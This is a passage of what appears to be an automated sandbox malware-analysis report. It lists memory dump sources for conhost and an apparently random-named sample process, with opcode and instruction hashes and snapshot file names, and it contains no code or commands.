                                                                                    • Instruction Fuzzy Hash: D2519FB6B19A498BE798DB5CD465BE97FE1FB9A314F50017EC00ED7791CAB91811C300
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: I
                                                                                    • API String ID: 0-3707901625
                                                                                    • Opcode ID: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction ID: ac234ff9dbf8d27131357c6d54bdfd49a1db4cf95054320098e49e93c8bd06fc
                                                                                    • Opcode Fuzzy Hash: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction Fuzzy Hash: CFE0127194B3C04FCB49EB3584A58957F60EF6721078E50EEC145CF1A3D62DD889C701
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4999263f1d7dad6a1f6a8c5a5d3e48b330a4df7a97789409692938ccb96fd58f
                                                                                    • Instruction ID: ec4734ecc5b48e27e7927fa953edc6f0ddbab1437bfc486c9c976bf1950e4c2c
                                                                                    • Opcode Fuzzy Hash: 4999263f1d7dad6a1f6a8c5a5d3e48b330a4df7a97789409692938ccb96fd58f
                                                                                    • Instruction Fuzzy Hash: EC21B032F0951B8AFB54EB48D8A56BF77A2FF65300F04053AC219D7381DF7969819780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction ID: 24eda12cd9a6022ea02aa2f8bf9272e9b29073fb4f36e0cb2ed3e6b450d99e4f
                                                                                    • Opcode Fuzzy Hash: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction Fuzzy Hash: 21210135B0E2898FE712EB2888A51DC7FB0EF83329F1445B7C280DF192D5391A4AA741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction ID: 3f96e98a21404424cbaacd5540ac77989398d89523c784de7e1146948ce8a7b1
                                                                                    • Opcode Fuzzy Hash: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction Fuzzy Hash: D111CE35B0E7888FE702EB2898A42DD7FB0EF83319F1544B7C284DF292D5391A499780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction ID: 6541a784fb46a1b52f8c29ef641667630fa5a2dcfa7baf3616abb2f26d24beba
                                                                                    • Opcode Fuzzy Hash: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction Fuzzy Hash: 1001AD35A0E7888FE702EB2884A42DD7FB0EF43314F1545EAC180DB292D5395A489B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 7dddf225c71f9e7a0ec9b22fc1032d6338144fc44058bdbccf12c89b7a2c25cf
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 57016D30A9D40E8AEBA8BA04D8A5BF872A5EF16300F5001B9D90ED31A1EE3D29C55A41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction ID: b138bdf6ada42a5344b5108d1015447a0bf97a31047aad3af935477e2d8f3502
                                                                                    • Opcode Fuzzy Hash: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction Fuzzy Hash: C5015E35A0E7888FD712EB68C8941DDBFB0AF43314F1545EAC580DB1A2D5395A48D781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0d609691cd0a67a7c1961c09a52ae71e5414ef4628c005c67fd8c3d1f11f7cd
                                                                                    • Instruction ID: 339c79a08c5faabb40d059207679bf155c41ebac141dff55519cc12ee3c3a66b
                                                                                    • Opcode Fuzzy Hash: b0d609691cd0a67a7c1961c09a52ae71e5414ef4628c005c67fd8c3d1f11f7cd
                                                                                    • Instruction Fuzzy Hash: E8F09632F495164BFB68FA08C8A56EC33A6EB92310F054676D40EC73D6DE2DAD4287C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6aa66d17187e342f2e5ec197a396205a8fbbc582ebdce762d483e0bd32156645
                                                                                    • Instruction ID: 416634f6f91798f7d8973e7e8c7c9591c5eb01d16092e96af3bcbb10056e4c01
                                                                                    • Opcode Fuzzy Hash: 6aa66d17187e342f2e5ec197a396205a8fbbc582ebdce762d483e0bd32156645
                                                                                    • Instruction Fuzzy Hash: A4F0A432F4951E8FEB58EB44C8A58BE73A1FB69310F04063AC11AD7390DF7869408740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction ID: 220322e8e1aa441e93854d38f7731614a4ebb86235473affcf0ae8e436dd0677
                                                                                    • Opcode Fuzzy Hash: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction Fuzzy Hash: B9018F34A0E3888FE712EB6484941DDBFF0AF03308F1441EAC580DB192D9395A48C741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction ID: 1024ff713126171387a3fc8aeef8a02c854a77d489bb69c09cd9b6fa1afbf811
                                                                                    • Opcode Fuzzy Hash: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction Fuzzy Hash: 01E07D3232D94E4FDF02FB3CDC974A83B50EB8B21078700FAD108CB0A2C212684E8B01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction ID: 4640bb846717c77e64037ae798f4c740fb56b9dcadbfe4fc94d7acd97375bf17
                                                                                    • Opcode Fuzzy Hash: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction Fuzzy Hash: B5D05E30B609094B8B0CB62D8458430F3D1E7AA6067945278D44BC3285ED2AECC68B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: c3574f17ea6472ccfd9d5795fce2fde2abe249d1d78e15150e0c03fe877680af
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: 97E01A70F4911A4BFBA8B248D8E13F96264EF8A304F145078DB6ED33C5DD3DAD409605
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction ID: 07d9137669ff819bbfef3455231f0d6bd9c63b4847d5cabdd0a3aaa4c5b20c5f
                                                                                    • Opcode Fuzzy Hash: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction Fuzzy Hash: B0D05B21B4D91747E645FA045CE077B2161EF19300F140074D64FC31C2CD3CE8427601
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd